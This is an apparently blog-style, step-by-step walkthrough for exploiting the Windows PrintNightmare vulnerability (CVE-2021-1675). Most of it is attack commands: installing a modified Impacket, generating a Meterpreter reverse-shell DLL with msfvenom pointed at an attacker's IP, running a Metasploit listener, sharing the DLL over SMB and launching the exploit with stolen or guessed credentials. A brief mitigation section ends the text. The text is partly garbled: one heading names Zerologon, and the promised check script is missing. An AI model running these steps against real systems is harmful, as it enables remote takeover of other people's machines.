PrintNightmare (CVE-2021-1675)
PrintNightmare (CVE-2021-1675) is a critical vulnerability in the Windows Print Spooler service that allows remote code execution. This vulnerability can be exploited to execute malicious DLLs either remotely or locally on affected machines.
Step-by-Step Process to Check for Zerologon Vulnerability
Check if the Domain is Vulnerable:
Use the following script to test if your domain is vulnerable to PrintNightmare:

if you saw this output then your target is vulnrable.
Installation :
Before executing the exploit, ensure you have the correct version of Impacket installed. Follow these steps:
Uninstall the default Impacket version:
pip3 uninstall impacket
Clone the custom Impacket repository:
git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py install
To create a Meterpreter payload that will provide remote shell access, use msfvenom to generate a malicious DLL :
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=5555 -f dll > shell.dll

3. Setting Up the Metasploit Listener
Open Metasploit Framework:

Use the multi/handler
exploit:
use exploit/multi/handler
Set the payload:
set payload windows/x64/meterpreter/reverse_tcp
Configure the listener with your IP and port:
set LHOST <your_ip>
set LPORT 5555
Verify the settings:
options
Run the exploit:
run


4. Setting Up File Sharing (SMB)
You need to share the location of your payload (shell.dll
) so that it can be accessed by the target machine.
Start an SMB server to share the directory containing
shell.dll
:python3 smbserver.py share <path-to-your-directory> //You may need to use the -smb2support flag if SMBv1 doesn't work.

6. Running the PrintNightmare Exploit
Now that everything is set up, execute the PrintNightmare exploit. This is done by running the CVE-2021-1675.py
script.
python3 CVE-2021-1675.py <domain>/<any-user>:<password>@<target-ip> '\\<file-share-location>'

7. Post-Exploit: Catch the Meterpreter Session
After executing the exploit, you should see a connection from the target system in Metasploit. Once the payload is triggered, you'll have a Meterpreter session established, allowing you to interact with the compromised system.
Mitigation
Microsoft has released patches for this vulnerability, but the system may still be vulnerable if the following registry values are present:
REG QUERY "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
RestrictDriverInstallationToAdministrators REG_DWORD 0x0
NoWarningNoElevationOnInstall REG_DWORD 0x1
To mitigate this vulnerability, ensure these values are set to the correct restrictions or disable the Print Spooler service altogether.
Disable the Spooler Service
You can disable the Spooler service to prevent further exploitation:
Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
This will stop and disable the Print Spooler service on the target machine.
Last updated